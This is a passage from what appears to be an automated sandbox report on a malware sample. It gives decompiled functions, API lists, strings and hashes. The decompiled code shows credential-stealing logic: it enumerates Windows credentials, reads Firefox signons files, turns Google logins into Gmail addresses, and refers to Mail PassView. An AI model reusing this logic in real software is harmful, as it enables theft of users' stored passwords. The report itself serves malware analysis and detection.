				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
				 *0x416fe0 = _t2;
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t4, "Module32First");
					 *0x416fd8 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "Module32Next");
						 *0x416fd4 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "Process32First");
							 *0x416e6c = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "Process32Next");
								 *0x416fcc = _t2;
								if(_t2 != 0) {
									 *0x417514 = 1;
								}
							}
						}
					}
				}
				goto L9;
			}

0x0040e05d
0x0040e0d9
0x0040e0d9
0x0040e065
0x0040e06b
0x0040e06f
0x0040e0d8
0x00000000
0x0040e0d8
0x0040e07e
0x0040e082
0x0040e087
0x0040e08f
0x0040e093
0x0040e098
0x0040e0a0
0x0040e0a4
0x0040e0a9
0x0040e0b1
0x0040e0b5
0x0040e0ba
0x0040e0c2
0x0040e0c6
0x0040e0cb
0x0040e0cd
0x0040e0cd
0x0040e0cb
0x0040e0ba
0x0040e0a9
0x0040e098
0x00000000

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,0040DD19), ref: 0040E065
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040E07E
GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040E08F
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040E0A0
GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040E0B1
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040E0C2

Strings

Module32Next, xrefs: 0040E09A
Process32Next, xrefs: 0040E0BC
Process32First, xrefs: 0040E0AB
CreateToolhelp32Snapshot, xrefs: 0040E078
kernel32.dll, xrefs: 0040E060
Module32First, xrefs: 0040E089

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
API String ID: 667068680-3953557276
Opcode ID: 5922207fa155356ca208c5dc00e328b28cc838d796c506d44ffc4ba24ef585aa
Instruction ID: 921299a9b586d994e9bf5e85ab2a2688844625279e80e39ff2614b99c2d6d575
Opcode Fuzzy Hash: 5922207fa155356ca208c5dc00e328b28cc838d796c506d44ffc4ba24ef585aa
Instruction Fuzzy Hash: 8DF06D70A45222A9C320CB266D00FFA3DA85A44B81B15843BE900F1694DBF8D5528B7C

Uniqueness

Uniqueness Score: -1.00%

Function 00404647, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404647(struct HINSTANCE__** __eax, void* __edi, void* __eflags) {
				void* __esi;
				struct HINSTANCE__* _t12;
				struct HINSTANCE__** _t23;

				_t23 = __eax;
				E004046C2(__eax);
				_t12 = LoadLibraryA("advapi32.dll");
				 *_t23 = _t12;
				if(_t12 != 0) {
					_t23[2] = GetProcAddress(_t12, "CredReadA");
					_t23[3] = GetProcAddress( *_t23, "CredFree");
					_t23[4] = GetProcAddress( *_t23, "CredDeleteA");
					_t23[5] = GetProcAddress( *_t23, "CredEnumerateA");
					_t23[6] = GetProcAddress( *_t23, "CredEnumerateW");
					if(_t23[2] == 0 || _t23[3] == 0) {
						E004046C2(_t23);
					} else {
						_t23[1] = 1;
					}
				}
				return _t23[1];
			}

0x00404648
0x0040464a
0x00404654
0x0040465c
0x0040465e
0x00404676
0x00404682
0x0040468e
0x0040469a
0x004046a3
0x004046a7
0x004046b8
0x004046af
0x004046af
0x004046af
0x004046a7
0x004046c1

APIs

Part of subcall function 004046C2: FreeLibrary.KERNEL32(?,0040464F,?,0040D601,80000001,74B5F420), ref: 004046C9

LoadLibraryA.KERNEL32(advapi32.dll,?,0040D601,80000001,74B5F420), ref: 00404654
GetProcAddress.KERNEL32(00000000,CredReadA), ref: 0040466D
GetProcAddress.KERNEL32(?,CredFree), ref: 00404679
GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404685
GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404691
GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040469D

Strings

CredReadA, xrefs: 00404667
CredEnumerateW, xrefs: 00404693
advapi32.dll, xrefs: 0040464F
CredFree, xrefs: 0040466F
CredDeleteA, xrefs: 0040467B
CredEnumerateA, xrefs: 00404687

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: AddressProc$Library$FreeLoad
String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
API String ID: 2449869053-4258758744
Opcode ID: 1dbd091348eef99b9c60bfcaa5dda145de35d3414d0ae1ecd7a3a02af1b4a616
Instruction ID: 1c6fa8d05b29e269fad2443f962c2e8eb3052cc88d23d174a3c6f0c0958544ff
Opcode Fuzzy Hash: 1dbd091348eef99b9c60bfcaa5dda145de35d3414d0ae1ecd7a3a02af1b4a616
Instruction Fuzzy Hash: 380121705447009AC730AF75CD08B46BAF4EF85704F218D2EE281A3690E7BE9491DF88

Uniqueness

Uniqueness Score: -1.00%

Function 00411015, Relevance: 19.7, APIs: 12, Strings: 1, Instructions: 202
stringCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00411015(void* __ecx, signed int __edx, void* __eflags, signed int _a4, intOrPtr _a8, char* _a12, signed int* _a16) {
				void _v8;
				void _v12;
				void _v24;
				char _v39;
				void _v40;
				char _v132;
				void _v1156;
				void _v1172;
				char _v1180;
				void _v1187;
				char _v1188;
				void _v2228;
				void _v2243;
				void _v2244;
				void _v3267;
				char _v3268;
				void _v4291;
				char _v4292;
				char _v5340;
				void _v5347;
				char _v5348;
				char _v6116;
				char _v7136;
				void _v7140;
				void* __edi;
				void* __esi;
				int _t86;
				void* _t109;
				void* _t122;
				void* _t135;
				char _t156;
				signed char _t168;
				signed int _t171;
				intOrPtr _t177;
				signed int _t183;
				void* _t185;

				_t171 = __edx;
				E004118A0(0x1be4, __ecx);
				_t156 = 0;
				_v3268 = 0;
				memset( &_v3267, 0, 0x3ff);
				_a8 = E00410E8A(_a8,  &_v3268);
				_t86 = strlen(_a4);
				_v8 = _t86;
				if(_a8 > 4) {
					_t193 = _t86;
					if(_t86 > 0) {
						asm("movsd");
						asm("movsd");
						asm("movsb");
						_v2244 = 0;
						memset( &_v2243, 0, 0x41e);
						_v1188 = 0;
						memset( &_v1187, 0, 0x41e);
						_v5348 = 0;
						memset( &_v5347, 0, 0x41e);
						_v40 = 0;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosw");
						asm("stosb");
						_v4292 = 0;
						memset( &_v4291, 0, 0x3ff);
						E0040BC49( &_v132);
						E0040BC6D(_v8,  &_v132, _a4);
						_t181 =  &_v132;
						E0040BD0B( &_v39,  &_v132,  &_v2244);
						memcpy( &_v2228,  &_v24, 8);
						E0040BC49( &_v132);
						_push( &_v2244);
						_t109 = 0x18;
						E0040BC6D(_t109,  &_v132);
						E0040BD0B( &_v39, _t181,  &_v1188);
						memcpy( &_v1172,  &_v2244, 0x10);
						memcpy( &_v1156,  &_v24, 8);
						E0040BC49(_t181);
						_push( &_v1188);
						_t122 = 0x28;
						E0040BC6D(_t122, _t181);
						E0040BD0B( &_v39, _t181,  &_v5348);
						E0040535A( &_v6116, _t193,  &_v1180,  &_v5348);
						E004053D6( &_v5340,  &_v1188,  &_v4292,  &_v6116);
						_t177 = _a8;
						asm("cdq");
						_t183 = _t177 + (_t171 & 0x00000007) >> 3;
						_a4 = 0;
						if(_t183 > 0) {
							do {
								E004053D6(_t185 + (_a4 << 3) - 0xcc0,  &_v6116, _t185 + (_a4 << 3) - 0x10b8,  &_v6116);
								_a4 =  &(_a4[1]);
							} while (_a4 < _t183);
							_t177 = _a8;
						}
						_t135 = 0;
						if(_t177 > _t156) {
							do {
								_t168 =  *(_t185 + _t135 - 0x10c0) ^  *(_t185 + _t135 - 0xcc0);
								_t135 = _t135 + 1;
								 *(_t185 + _t135 - 0x1be1) = _t168;
							} while (_t135 < _t177);
						}
						 *((char*)(_t185 + _t177 - 0x1be0)) = _t156;
						strcpy(_a12,  &_v7136);
						E0040BC49( &_v132);
						_t67 = _t177 - 4; // 0x0
						E0040BC6D(_t67,  &_v132, _a12);
						E0040BD0B(_t177,  &_v132,  &_v40);
						memcpy( &_v8,  &_v40, 4);
						memcpy( &_v12,  &_v7140, 4);
						_t156 = 1;
						 *_a16 = 0 | _v8 == _v12;
					}
				}
				return _t156;
			}

0x00411015
0x0041101d
0x00411025
0x00411034
0x0041103a
0x00411053
0x00411056
0x00411060
0x00411063
0x00411069
0x0041106b
0x00411079
0x0041107a
0x0041107b
0x0041108a
0x00411090
0x0041109e
0x004110a4
0x004110b2
0x004110b8
0x004110bf
0x004110c5
0x004110c6
0x004110c7
0x004110c8
0x004110cf
0x004110d8
0x004110de
0x004110e6
0x004110f4
0x00411100
0x00411103
0x00411115
0x0041111f
0x0041112a
0x0041112d
0x00411130
0x0041113c
0x00411151
0x00411163
0x0041116a
0x00411175
0x00411178
0x0041117b
0x00411187
0x004111a6
0x004111be
0x004111c3
0x004111c8
0x004111d0
0x004111d8
0x004111db
0x004111dd
0x004111f8
0x004111fd
0x00411203
0x00411206
0x00411206
0x00411209
0x0041120d
0x0041120f
0x00411216
0x0041121d
0x00411220
0x00411220
0x0041120f
0x00411233
0x0041123a
0x00411242
0x0041124a
0x00411250
0x0041125c
0x0041126b
0x0041127d
0x00411295
0x00411296
0x00411296
0x0041106b
0x0041129e

APIs

memset.MSVCRT ref: 0041103A

Part of subcall function 00410E8A: strlen.MSVCRT ref: 00410E97

strlen.MSVCRT ref: 00411056
memset.MSVCRT ref: 00411090
memset.MSVCRT ref: 004110A4
memset.MSVCRT ref: 004110B8
memset.MSVCRT ref: 004110DE

Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCFE

Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD2A
Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD40
Part of subcall function 0040BD0B: memcpy.MSVCRT ref: 0040BD77
Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD81

memcpy.MSVCRT ref: 00411115

Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCB0
Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCDA

Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD52

memcpy.MSVCRT ref: 00411151
memcpy.MSVCRT ref: 00411163
strcpy.MSVCRT(?,?), ref: 0041123A
memcpy.MSVCRT ref: 0041126B
memcpy.MSVCRT ref: 0041127D

Strings

salu, xrefs: 00411071

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: memcpymemset$strlen$strcpy
String ID: salu
API String ID: 2660478486-4177317985
Opcode ID: ae1d07347fa3aa89f5fcc6141a6fc90f028ff7b9ab687112944546eff88cf5b8
Instruction ID: 480a48fc981763c339c301d1addb7ab339a070bf665ce532ed27993edd9122c1
Opcode Fuzzy Hash: ae1d07347fa3aa89f5fcc6141a6fc90f028ff7b9ab687112944546eff88cf5b8
Instruction Fuzzy Hash: A4717F7190011DAADB10EBA9CC819DEB7BDFF08348F1445BAF609E7151DB749B888F94

Uniqueness

Uniqueness Score: -1.00%

Function 00403E87, Relevance: 19.6, APIs: 7, Strings: 6, Instructions: 98
stringCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00403E87(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr* _v8;
				char _v76;
				void _v1099;
				char _v1100;
				void _v2123;
				char _v2124;
				void _v3147;
				char _v3148;
				char _v4172;
				void* __ebx;
				void* __esi;
				void* _t36;
				void* _t37;
				void* _t48;
				void* _t55;
				intOrPtr* _t56;
				signed int _t58;
				intOrPtr* _t63;
				void* _t70;
				void* _t71;

				_t56 = __ecx;
				E004118A0(0x1048, __ecx);
				_t63 = _t56;
				_v8 = _t63;
				E00405EFD(_a4, "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
				_v1100 = 0;
				memset( &_v1099, 0, 0x3ff);
				_v3148 = 0;
				memset( &_v3147, 0, 0x3ff);
				_v2124 = 0;
				memset( &_v2123, 0, 0x3ff);
				_t71 = _t70 + 0x2c;
				if( *0x417308 != 0) {
					sprintf( &_v3148, "<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>", 0x417308);
					_t71 = _t71 + 0xc;
				}
				if( *0x417304 != 0) {
					strcpy( &_v1100, "<table dir=\"rtl\"><tr><td>\r\n");
				}
				_t36 =  *((intOrPtr*)( *_t63 + 0x1c))();
				_t58 = 0x10;
				_push(_t36);
				_t37 = memcpy( &_v76, "<html><head>%s<title>%s</title></head>\r\n<body>\r\n%s <h3>%s</h3>\r\n", _t58 << 2);
				asm("movsb");
				sprintf( &_v4172,  &_v76,  &_v3148, _t37,  &_v1100);
				E00405EFD(_a4,  &_v4172);
				_push("Mail PassView");
				_t55 = 6;
				_push(E004078FF(_t55));
				sprintf( &_v2124, "<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
				_t48 = E00405EFD(_a4,  &_v2124);
				_t78 = _a8 - 4;
				if(_a8 == 4) {
					return E004097E6(_v8, _t78, _a4);
				}
				return _t48;
			}

0x00403e87
0x00403e8f
0x00403e9f
0x00403ea1
0x00403ea4
0x00403eb9
0x00403ebf
0x00403ecd
0x00403ed3
0x00403ee1
0x00403ee7
0x00403eec
0x00403ef5
0x00403f08
0x00403f0d
0x00403f0d
0x00403f16
0x00403f24
0x00403f2a
0x00403f2f
0x00403f34
0x00403f35
0x00403f3e
0x00403f5a
0x00403f5b
0x00403f6a
0x00403f72
0x00403f79
0x00403f7f
0x00403f8c
0x00403f9b
0x00403fa3
0x00403fa7
0x00000000
0x00403faf
0x00403fb8

APIs

Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,Mt,00000000,?,?,004092ED,00000001,00412B1C,74E04DE0), ref: 00405F17

memset.MSVCRT ref: 00403EBF
memset.MSVCRT ref: 00403ED3
memset.MSVCRT ref: 00403EE7
sprintf.MSVCRT ref: 00403F08
strcpy.MSVCRT(?,<table dir="rtl"><tr><td>), ref: 00403F24
sprintf.MSVCRT ref: 00403F5B
sprintf.MSVCRT ref: 00403F8C

Strings

<meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F02
<table dir="rtl"><tr><td>, xrefs: 00403F1E
<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403F86
<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403F36
Mail PassView, xrefs: 00403F72
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403E97

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: memsetsprintf$FileWritestrcpystrlen
String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>$Mail PassView
API String ID: 1043021993-495024357
Opcode ID: 9ab723875cfdb90570c6b26727e8dc31f2cea9ea6bbea43a89162690f7ebea04
Instruction ID: b86957a5e19b08f75c710fe46d40d6f019605627493d012667a382a844d4f915
Opcode Fuzzy Hash: 9ab723875cfdb90570c6b26727e8dc31f2cea9ea6bbea43a89162690f7ebea04
Instruction Fuzzy Hash: A93196B2C40118BADB11EB55DC82EDE7BACEF44304F0045A7B60DA3151DE786FC88BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404288, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404288(intOrPtr __ecx, void* __esi, void* __fp0, wchar_t** _a4) {
				intOrPtr _v8;
				char _v280;
				char _v408;
				intOrPtr _v412;
				char _v796;
				intOrPtr _v800;
				char _v928;
				char _v940;
				wchar_t* _t23;
				char* _t41;
				wchar_t** _t59;
				void* _t76;

				_t76 = __fp0;
				_t59 = _a4;
				_t23 =  *_t59;
				_v8 = __ecx;
				if(_t23 != 0 && _t59[1] != 0 && _t59[2] != 0 && wcsstr(_t23, L"www.google.com") != 0) {
					E004021D8( &_v940);
					_v800 = 7;
					_v412 = 3;
					WideCharToMultiByte(0, 0, _t59[1], 0xffffffff,  &_v408, 0x7f, 0, 0);
					WideCharToMultiByte(0, 0, _t59[2], 0xffffffff,  &_v280, 0x7f, 0, 0);
					strcpy( &_v928,  &_v408);
					strcpy( &_v796,  &_v408);
					if(strchr( &_v796, 0x40) == 0 && strlen( &_v408) + 0xa < 0x7f) {
						sprintf( &_v796, "%s@gmail.com",  &_v408);
					}
					_t41 = strchr( &_v928, 0x40);
					if(_t41 != 0) {
						 *_t41 = 0;
					}
					E00402407( &_v940, _t76, _v8 + 0xfffff788);
				}
				return 1;
			}

0x00404288
0x00404293
0x00404296
0x0040429c
0x0040429f
0x004042d3
0x004042ee
0x004042fa
0x00404304
0x00404318
0x00404328
0x0040433b
0x00404354
0x0040437e
0x00404383
0x0040438f
0x00404398
0x0040439a
0x0040439a
0x004043ab
0x004043ab
0x004043b6

APIs

wcsstr.MSVCRT ref: 004042BD
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00404304
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00404318
strcpy.MSVCRT(?,?), ref: 00404328
strcpy.MSVCRT(?,?,?,?), ref: 0040433B
strchr.MSVCRT ref: 00404349
strlen.MSVCRT ref: 0040435D
sprintf.MSVCRT ref: 0040437E
strchr.MSVCRT ref: 0040438F

Strings

%s@gmail.com, xrefs: 00404378
www.google.com, xrefs: 004042B7

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWidestrchrstrcpy$sprintfstrlenwcsstr
String ID: %s@gmail.com$www.google.com
API String ID: 1359934567-4070641962
Opcode ID: 8108c03dee5360a7f6a3e2f925f6b83e3505abd913d650f45db378c2ca998167
Instruction ID: 90bd0330eeb49ee3a27dc93359d6b9986b282e86ae315167fefd13048bcd18fc
Opcode Fuzzy Hash: 8108c03dee5360a7f6a3e2f925f6b83e3505abd913d650f45db378c2ca998167
Instruction Fuzzy Hash: 793188B290021D7FDB21D791DD81FDAB3ACDB44354F1005A7F709E2181D678AF858A58

Uniqueness

Uniqueness Score: -1.00%

Function 0040827A, Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69
stringCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0040827A(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, char* _a8) {
				void _v4103;
				char _v4104;
				int _t21;
				int _t28;
				void* _t35;

				_t35 = __eflags;
				E004118A0(0x1004, __ecx);
				strcpy(0x4171b8, _a8);
				strcpy(0x4172c0, "general");
				E00407E55(_t35, "TranslatorName", 0x412466);
				E00407E55(_t35, "TranslatorURL", 0x412466);
				EnumResourceNamesA(_a4, 4, E004080A3, 0);
				EnumResourceNamesA(_a4, 5, E004080A3, 0);
				strcpy(0x4172c0, "strings");
				_t28 = 0;
				_v4104 = 0;
				memset( &_v4103, 0, 0x1000);
				do {
					_t21 = LoadStringA(_a4, _t28,  &_v4104, 0x1000);
					if(_t21 > 0) {
						_t21 = E00407EC3(_t28,  &_v4104);
					}
					_t28 = _t28 + 1;
				} while (_t28 <= 0xffff);
				 *0x4171b8 = 0;
				return _t21;
			}

0x0040827a
0x00408282
0x00408292
0x004082a2
0x004082b2
0x004082bd
0x004082d8
0x004082e2
0x004082ea
0x004082f5
0x004082ff
0x00408306
0x0040830e
0x0040831a
0x00408322
0x0040832c
0x00408332
0x00408333
0x00408334
0x0040833e
0x00408347

APIs

strcpy.MSVCRT(004171B8,00000000,00000000,00000000,?,?,004083AB,00000000,?,00000000,00000104,?), ref: 00408292
strcpy.MSVCRT(004172C0,general,004171B8,00000000,00000000,00000000,?,?,004083AB,00000000,?,00000000,00000104,?), ref: 004082A2

Part of subcall function 00407E55: memset.MSVCRT ref: 00407E7A
Part of subcall function 00407E55: GetPrivateProfileStringA.KERNEL32(004172C0,00000104,00412466,?,00001000,004171B8), ref: 00407E9E
Part of subcall function 00407E55: WritePrivateProfileStringA.KERNEL32(004172C0,?,?,004171B8), ref: 00407EB5

EnumResourceNamesA.KERNEL32 ref: 004082D8
EnumResourceNamesA.KERNEL32 ref: 004082E2
strcpy.MSVCRT(004172C0,strings,?,004083AB,00000000,?,00000000,00000104,?), ref: 004082EA
memset.MSVCRT ref: 00408306
LoadStringA.USER32 ref: 0040831A

Part of subcall function 00407EC3: _itoa.MSVCRT ref: 00407EE4

Strings

TranslatorName, xrefs: 004082AD
TranslatorURL, xrefs: 004082B8
general, xrefs: 00408297
strings, xrefs: 004082E4

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Stringstrcpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
String ID: TranslatorName$TranslatorURL$general$strings
API String ID: 1060401815-3647959541
Opcode ID: acaf4a6ca7367b184f6fdf17ade1074e09c73fb74d797c334c49b365d943b025
Instruction ID: d5eae57ffc3fdd8f11c9b4c351fac369e1a37aafa95eb04bb89d09d1e585c4c7
Opcode Fuzzy Hash: acaf4a6ca7367b184f6fdf17ade1074e09c73fb74d797c334c49b365d943b025
Instruction Fuzzy Hash: 6E1104319802543AD7212B56DC06FCB3E6DCF85B59F1040BBB708B6191C9BC9EC087AD

Uniqueness

Uniqueness Score: -1.00%

Function 0040D1EC, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 128
stringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0040D1EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
				void _v267;
				char _v268;
				void* __edi;
				void* __esi;
				void* _t31;
				int _t40;
				void* _t44;
				void* _t49;
				char* _t50;
				void* _t57;
				int _t62;
				char* _t68;
				void* _t70;
				void* _t73;
				void* _t74;
				intOrPtr* _t86;
				char* _t89;
				void* _t90;
				char** _t91;

				_t86 = __eax;
				_t31 = E00406C2F(__eax + 0x1c, __eax, __eflags, _a4);
				_t94 = _t31;
				if(_t31 == 0) {
					__eflags = 0;
					return 0;
				}
				E0040462E(_t86 + 0x468);
				_t68 = _t86 + 0x158;
				E004061FF(_t68, _a4);
				_t89 = _t86 + 0x25d;
				 *_t89 = 0;
				E0040C530(_t94, _t86 + 0x18);
				if( *_t89 == 0) {
					_t62 = strlen(_t68);
					 *_t91 = "signons.txt";
					_t9 = strlen(??) + 1; // 0x1
					if(_t62 + _t9 >= 0x104) {
						 *_t89 = 0;
					} else {
						E004062AD(_t89, _t86 + 0x158, "signons.txt");
					}
				}
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				_t40 = strlen(_t86 + 0x158);
				_t91[3] = "signons.sqlite";
				_t15 = strlen(??) + 1; // 0x1
				_pop(_t73);
				if(_t40 + _t15 >= 0x104) {
					_v268 = 0;
				} else {
					E004062AD( &_v268, _t86 + 0x158, "signons.sqlite");
					_pop(_t73);
				}
				_t98 =  *_t89;
				if( *_t89 != 0) {
					_t57 = E00406C2F(_t86 + 4, _t86, _t98, _t89);
					_t99 = _t57;
					if(_t57 != 0) {
						E0040C475(_t73, _t86, _t99);
					}
				}
				_t44 = E0040614B( &_v268);
				_t100 = _t44;
				_pop(_t74);
				if(_t44 != 0) {
					E0040CE28(_t74, _t100, _t86,  &_v268);
				}
				_t70 = 0;
				if( *((intOrPtr*)(_t86 + 0x474)) <= 0) {
					L19:
					return 1;
				} else {
					do {
						_t90 = E0040D438(_t70, _t86 + 0x468);
						_t24 = _t90 + 0x504; // 0x504
						_t49 = _t24;
						_push("none");
						_push(_t49);
						L004115B2();
						if(_t49 != 0) {
							_t25 = _t90 + 4; // 0x4
							_t50 = _t25;
							if( *_t50 == 0) {
								_t26 = _t90 + 0x204; // 0x204
								strcpy(_t50, _t26);
							}
							 *((intOrPtr*)( *_t86 + 4))(_t90);
						}
						_t70 = _t70 + 1;
					} while (_t70 <  *((intOrPtr*)(_t86 + 0x474)));
					goto L19;
				}
			}

0x0040d1fb
0x0040d200
0x0040d205
0x0040d207
0x0040d371
0x00000000
0x0040d371
0x0040d213
0x0040d21b
0x0040d223
0x0040d22c
0x0040d233
0x0040d236
0x0040d23e
0x0040d241
0x0040d248
0x0040d254
0x0040d25e
0x0040d277
0x0040d260
0x0040d26e
0x0040d274
0x0040d25e
0x0040d288
0x0040d28f
0x0040d29e
0x0040d2a5
0x0040d2b1
0x0040d2ba
0x0040d2bb
0x0040d2d8
0x0040d2bd
0x0040d2cf
0x0040d2d5
0x0040d2d5
0x0040d2df
0x0040d2e2
0x0040d2e8
0x0040d2ed
0x0040d2ef
0x0040d2f1
0x0040d2f1
0x0040d2ef
0x0040d2fd
0x0040d302
0x0040d304
0x0040d305
0x0040d30f
0x0040d30f
0x0040d314
0x0040d31c
0x0040d36c
0x00000000
0x0040d31e
0x0040d31e
0x0040d32b
0x0040d32d
0x0040d32d
0x0040d333
0x0040d338
0x0040d339
0x0040d342
0x0040d344
0x0040d344
0x0040d34a
0x0040d34c
0x0040d354
0x0040d35a
0x0040d360
0x0040d360
0x0040d363
0x0040d364
0x00000000
0x0040d31e

APIs

Part of subcall function 00406C2F: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040D205,?,?,?,?), ref: 00406C48
Part of subcall function 00406C2F: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00406C74

Part of subcall function 0040462E: free.MSVCRT(00000000,0040BC35), ref: 00404635

Part of subcall function 004061FF: strcpy.MSVCRT(?,?,0040D228,?,?,?,?,?), ref: 00406204
Part of subcall function 004061FF: strrchr.MSVCRT ref: 0040620C

Part of subcall function 0040C530: memset.MSVCRT ref: 0040C551
Part of subcall function 0040C530: memset.MSVCRT ref: 0040C565
Part of subcall function 0040C530: memset.MSVCRT ref: 0040C579
Part of subcall function 0040C530: memcpy.MSVCRT ref: 0040C646
Part of subcall function 0040C530: memcpy.MSVCRT ref: 0040C6A6

strlen.MSVCRT ref: 0040D241
strlen.MSVCRT ref: 0040D24F

Part of subcall function 004062AD: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062B5
Part of subcall function 004062AD: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062C4

memset.MSVCRT ref: 0040D28F
strlen.MSVCRT ref: 0040D29E
strlen.MSVCRT ref: 0040D2AC
_stricmp.MSVCRT(00000504,none,?,?,?), ref: 0040D339
strcpy.MSVCRT(00000004,00000204,?,?,?), ref: 0040D354

Strings

signons.sqlite, xrefs: 0040D2A5, 0040D2C3
none, xrefs: 0040D333
signons.txt, xrefs: 0040D248, 0040D266

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: memsetstrlen$strcpy$memcpy$CloseFileHandleSize_stricmpfreestrcatstrrchr
String ID: none$signons.sqlite$signons.txt
API String ID: 2681923396-1088577317
Opcode ID: 320e3f5b2275387b9dd69f73878994cc1174bc0b0e146de94454896ca0fe85a1
Instruction ID: 747294efef189d2a86bae337d02489a359e47e35f4212505bb9232dde5c11721
Opcode Fuzzy Hash: 320e3f5b2275387b9dd69f73878994cc1174bc0b0e146de94454896ca0fe85a1
Instruction Fuzzy Hash: 3041E3B1508246AAD710EBB1CC81BDAB798AF40305F10057FE596E21C2EB7CE9C9876D

Uniqueness

Uniqueness Score: -1.00%

Function 00402C44, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 104
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402C44(void* __ecx, void* __fp0, intOrPtr _a4) {
				void* _v8;
				int _v12;
				char _v16;
				char _v20;
				void _v275;
				char _v276;
				void _v1299;
				char _v1300;
				void* __esi;
				void* _t35;
				intOrPtr _t36;
				void* _t40;
				void* _t52;
				void* _t58;
				void* _t60;
				void* _t64;
				char* _t66;
				void* _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;
				void* _t83;

				_t83 = __fp0;
				_t64 = __ecx;
				_t35 = E0040EB3F(0x80000001, "Identities",  &_v8);
				_t74 = _t73 + 0xc;
